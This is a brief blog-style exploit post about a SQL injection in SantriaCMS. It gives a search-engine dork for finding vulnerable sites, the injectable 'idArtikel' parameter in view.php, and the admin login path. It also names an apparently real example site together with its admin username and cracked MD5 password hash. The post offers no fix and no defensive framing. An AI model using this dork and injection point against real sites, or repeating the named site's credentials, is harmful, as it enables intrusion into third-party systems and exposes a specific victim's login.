SantriaCMS SQL Injection Vulnerability
Dork : "view.php?idArtikel="
Exploit :
http://target.com/cms/view.php?idArtikel=[SQLi]
adminpage = /login.php
example site :
http://joksus.com
username : admin
password : 21232f297a57a5a743894a0e4a801fc3 => [admin]
0 Coment:
Posting Komentar